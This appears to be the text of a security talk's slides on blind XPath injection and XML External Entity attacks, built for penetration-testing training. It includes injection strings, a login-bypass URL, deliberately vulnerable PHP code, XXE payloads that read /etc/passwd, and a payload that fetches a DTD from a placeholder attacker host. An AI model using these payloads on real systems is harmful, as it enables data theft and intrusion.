  • 16. Blind XPath Injection ● count(//user/child::node() - Return the number of nodes ● Find the error with injecting the following code ‘ or count (parent::*[position()=1])=0 or ‘a’=’b ‘ or count (parent::*[position()=1])>0 or ‘a’=’b 1 or count (parent::*[position()=1])=0 1 or count (parent::*[position()=1])>0
  • 17. Example Attack & Resources ● Login Bypass http://site.com/login.php?username=admin’ or 1=1 or ‘’=’ ● Tools Xcat (https://github.com/orf/xcat) ● Cheat Sheets https://github.com/toekhaing/xml_attacks/blob/master/xpath _Injection.txt
  • 18. XML External Entities (XXE) ● Type of Injection Attack to an application that parses XML input. ● Caused by misconfigured XML Parser. ● Leads to Extracting Sensitive Data ● Remote Code Execution (RCE) in some cases
  • 19. Common XXE Vulnerabilities ● Apache POI ● CVE-2014-3574 ● CVE-2014-3529 ● DOCX4J ● OpenXML SDK ● NOKOGIRI ● CVE-2012-6685 ● CVE-2014-3660 ● Play Framework XXE
  • 20. Finding XXE Flaws ● Wide Attack Surface ● Register Page, login page, file upload and etc. ● Checking [Content-Type].xml
  • 21. Detection for XXE Vulnerability ● Read local files on web server by using SYSTEM entity <!ENTITY xxe SYSTEM “file:///etc/passwd “ > ● Process Document Type Declaration (DTD) to remote <!ENTITY xxe SYSTEM "http://IP:PORT/test.dtd"> ● File Upload (OOXML) Upload file xml, docx, xlsx with embedded xxe payload.
  • 22. Example Attack PHP Code <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); $user = $login->user; $pass = $login->pass; echo "You have logged in as user $user"; ?> Request <login> <user>Toe</user> <pass>mypass</pass> </login>
  • 23. Exploitation Simple XXE Payload that extract local file /etc/passwd <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <login> <user>&xxe;</user> <pass>mypass</pass> </login>
  • 24. Proof of Concept $curl -d payload.txt http://site.com/login.php
  • 25. Exploiting File upload XXE (OOXML) ● Insert XML codes to docx(whatever) files ● Payload <!DOCTYPE xxe [ <!ENTITY % get SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://YOURIP:8080/payload.dtd" > %get %dtd;]> ● Tool https://github.com/BuffaloWill/oxml_xxe
  • 26. Demonstration XXE Attack demonstration with XXE Lab https://github.com/jbarone/xxelab
  • 27. Case Study Pentester Lab : Play XML Entities https://www.vulnhub.com/entry/pentester-lab-play-xml-entities,119 Notes & Collections of XML Attacks https://github.com/toekhaing/xml_attacks
  • 28. EOF Thanks for your attention